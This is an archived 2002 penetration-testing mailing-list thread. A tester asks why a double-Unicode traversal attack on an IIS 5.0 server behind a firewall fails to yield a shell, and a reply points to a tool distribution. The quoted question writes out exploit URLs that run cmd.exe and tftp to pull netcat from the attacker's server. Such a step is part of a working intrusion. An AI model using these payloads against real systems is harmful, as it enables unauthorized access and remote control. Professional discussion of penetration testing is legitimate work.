RE: Can't get a shell

From: Rico Valdez (Rico.Valdez@sri.com)
Date: Thu Jul 11 2002 - 13:19:43 EDT


Find the unitools distribution. If the firewall is the issue, that should do the trick. The following link should help to get you going.

http://marc.theaimsgroup.com/?l=bugtraq&m=98040935006042&w=2

Good Luck!

Rico

> -----Original Message-----
> From: Gaziel, Avishay [mailto:agaziel@kpmg.com]
> Sent: Tuesday, July 09, 2002 10:33 AM
> To: PEN-TEST@securityfocus.com
> Subject: Can't get a shell
>
>
> Hi All,
> Situation:
> An IIS5.0 vulnerable to unicode.("double Unicode" i.e.
> ..%255c.. etc.)
> IIS sitting behind a firewall.
> Problem:
> host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-
> i+myserver+get
> +nc.exe doesn't work
> I keep getting (from my pumpkin tftp server) an error message
> saying that
> there's something wrong with the variables.
> another strange thing is that even if I don't get the error
> message the tftp
> session will not start and will timeout, if I deny access I
> keep getting
> access requests from the IIS.(Pumpkin is configured to prompt
> whenever a
> download/upload starts)
> What have I tried to do?
> Use
> host/scripts/..%255c.........../winnt/system32/tftp.exe+-i+mys
erver+get+nc.e
> xe instead of the above mentioned...doesn't work as well.
> What do I think is wrong?
> The FW is blocking all udp traffic out.
> What do I need?
> 1. Suggestions
> 2.Workarounds
> Avishay
>
>
>
>
>
> **************************************************************
> ***************
> The information in this email is confidential and may be
> legally privileged.
> It is intended solely for the addressee. Access to this email
> by anyone else
> is unauthorized.
>
> If you are not the intended recipient, any disclosure,
> copying, distribution
> or any action taken or omitted to be taken in reliance on it,
> is prohibited
> and may be unlawful. When addressed to our clients any
> opinions or advice
> contained in this email are subject to the terms and
> conditions expressed in
> the governing KPMG client engagement letter.
> **************************************************************
> ***************
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA)
> Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security
> vulnerabilities please see:
> https://alerts.securityfocus.com/
>
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:23 EDT